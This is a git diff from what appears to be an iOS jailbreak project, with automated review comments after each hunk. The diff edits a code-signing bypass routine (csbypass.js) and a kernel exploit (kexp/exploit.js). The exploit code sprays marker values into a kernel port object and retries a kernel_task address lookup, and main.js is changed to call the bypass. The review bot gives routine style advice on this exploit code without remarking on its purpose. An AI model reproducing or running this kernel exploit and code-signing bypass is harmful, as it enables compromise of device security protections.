-rw-r--r--src/js/csbypass.js7
-rwxr-xr-xsrc/js/kexp/exploit.js12
-rw-r--r--src/js/main.js4
3 files changed, 17 insertions, 6 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 12388a0..cc9302f 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -13,6 +13,7 @@ var my_kIOSurfaceBytesPerRow;
var my_kIOSurfaceWidth;
var my_kIOSurfaceHeight;
var my_kIOSurfacePixelFormat;
+var kCFAllocatorDefault;
function csbypass() {
printf("hello from csbypass!\n");
@@ -34,11 +35,12 @@ function memcpy_exec(dst, src, size) {
printf("%x %x\n", CFDictionarySetValue_addr + get_dyld_shc_slide(), dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue"));
dict = CFDictionaryCreateMutable(0, 0, kCFTypeDictionaryKeyCallBacks_addr + get_dyld_shc_slide(), kCFTypeDictionaryValueCallBacks_addr + get_dyld_shc_slide());
printf("dict: %p\n", dict);
- var test = CFNumberCreate(0, kCFNumberSInt32Type, pitch);
+ var test = CFNumberCreate(read_u32(kCFAllocatorDefault), kCFNumberSInt32Type, pitch);
printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- CFDictionarySetValue(dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
+ CFDictionarySetValue(dict, read_u32(my_kIOSurfaceBytesPerRow), test, 0);
+ printf("lol420\n");
CFDictionarySetValue(dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
CFDictionarySetValue(dict, read_u32(my_kIOSurfaceHeight), read_u32(my_kIOSurfaceHeight + 4), read_u32(my_kIOSurfaceHeight + 8), read_u32(my_kIOSurfaceHeight + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, height));
CFDictionarySetValue(dict, read_u32(my_kIOSurfacePixelFormat), read_u32(my_kIOSurfacePixelFormat + 4), read_u32(my_kIOSurfacePixelFormat + 8), read_u32(my_kIOSurfacePixelFormat + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, pixel_format));
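Review bot: `read_u32(kCFAllocatorDefault)` on the new line 26 dereferences whatever dlsym returned on line 39 without checking it; dlsym returns 0 when the symbol is not found, so a missing symbol becomes a read at address 0 instead of a clear error. A guard at the lookup site such as `if (!kCFAllocatorDefault) { printf("dlsym(kCFAllocatorDefault) failed\n"); return; }` (or whatever failure path linkIOSurface already uses) would make that case visible. The CoreFoundation framework is also dlopen'd twice in a row on lines 38–39; a local `var cf = dlopen(...)` reused by both dlsym calls reads more clearly. The added trace `printf("lol420\n")` on line 32 is a placeholder marker and should either say what stage was reached or be dropped. The enclosing function (memcpy_exec per the hunk header, though that may only be the nearest preceding definition) starts before the hunk and continues past it.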
@@ -61,6 +63,7 @@ function linkIOSurface() {
my_IOSurfaceAcceleratorTransferSurface = dlsym(h, "IOSurfaceAcceleratorTransferSurface");
CFDictionarySetValue_addr = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "CFDictionarySetValue") - get_dyld_shc_slide();
+ kCFAllocatorDefault = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFAllocatorDefault");
scall("printf", "%x %x %x\n", my_IOSurfaceAcceleratorCreate, my_IOSurfaceCreate, my_IOSurfaceAcceleratorTransferSurface);
}
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6f34aaf..47ff1c0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -502,10 +502,15 @@ again: while (true) {
printf("fuck\n");
printf("fuck\n");
- write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i, 0x41410000 | i);
+ }
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i + 0x78, 0x41420000 | i);
+ }
+// write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
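Review bot: `var i` is declared twice in the same function scope by the two loops on lines 50 and 53; with `var` both hoist to one binding so it runs, but the duplicate declaration reads as an oversight — declare `i` once before the loops, or use `let` in each `for` header if the target engine supports it. The replaced `write_u32(kport + 0x50, ...)` line is kept as a commented-out copy on line 56 next to the older commented-out line on 58; dead code should be deleted (history lives in version control) or carry a one-line comment saying why it is retained. The bound `0x78` is also hard-coded three times across the two loops; a single named constant would document what it denotes. The enclosing `again:` loop starts outside the hunk.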
@@ -539,6 +544,9 @@ again: while (true) {
printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
printf("fuck\n");
call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ if (kernel_task_addr === 0xffffffff) {
+ continue again;
+ }
scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
printf("fuck\n");
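Review bot: The comparison `kernel_task_addr === 0xffffffff` on line 67 tests an unexplained magic value; name it (e.g. `var KERNEL_TASK_ADDR_INVALID = 0xffffffff;` alongside the file's other constants) or add a comment such as `// sentinel: presumably set when the lookup fails — confirm against the code that assigns kernel_task_addr`. The guard also sits after line 66 has already passed `kernel_task_addr` to read_u32, so on the sentinel path that read happens before the retry; if the sentinel marks an unusable value, the ordering is worth a second look. The enclosing `again:` loop starts outside the hunk.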
diff --git a/src/js/main.js b/src/js/main.js
index 75d730d..0a1de50 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -79,9 +79,9 @@ function main() {
setup_fancy_rw();
-// csbypass();
+ csbypass();
-// return;
+ return;
printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));